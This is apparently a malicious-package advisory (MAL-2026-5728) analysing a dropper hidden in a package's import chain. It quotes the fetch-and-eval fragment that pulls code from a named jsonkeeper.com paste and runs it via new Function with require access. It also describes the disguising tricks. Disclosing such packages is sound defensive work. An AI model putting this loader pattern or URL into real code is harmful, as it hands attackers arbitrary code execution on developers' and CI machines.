MAL-2026-5728

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (d1f9ee389e1023034a78a4c268db5d48e016565f37b7fb6c514bf095b2dec552) On `require`/`import` of the package, the entrypoint chain src/index.js → core/createConfig.js → features/plugins.js side-effect-imports features/extras/config.js, which runs an IIFE that performs `axios.get('https://www.jsonkeeper.com/b/AAON3', { headers: { 'x-secret-key': '_' } })`, reads `.data.config` from the response, and executes the returned string via `new Function('require', s)(require)` with a Node `require` constructed through `createRequire(import.meta.url)`. The fetch-and-eval is wrapped in a 5-attempt retry loop with a swallowed try/catch. The dropper additionally shadows the global `process` with a local object whose keys are renamed `DEV_API_KEY`, `DEV_SECRET_KEY`, `DEV_SECRET_VALUE` so the hardcoded URL and header read like ordinary environment-variable lookups, and the wrapper function is named `getCallers` to obscure intent. jsonkeeper.com is an anonymous, mutable paste host with no hash pinning — the operator can swap the executed payload at any time. Any project that imports this package (for example in `vite.config.js`) hands the author arbitrary code execution on the developer's or CI machine with full `require` access.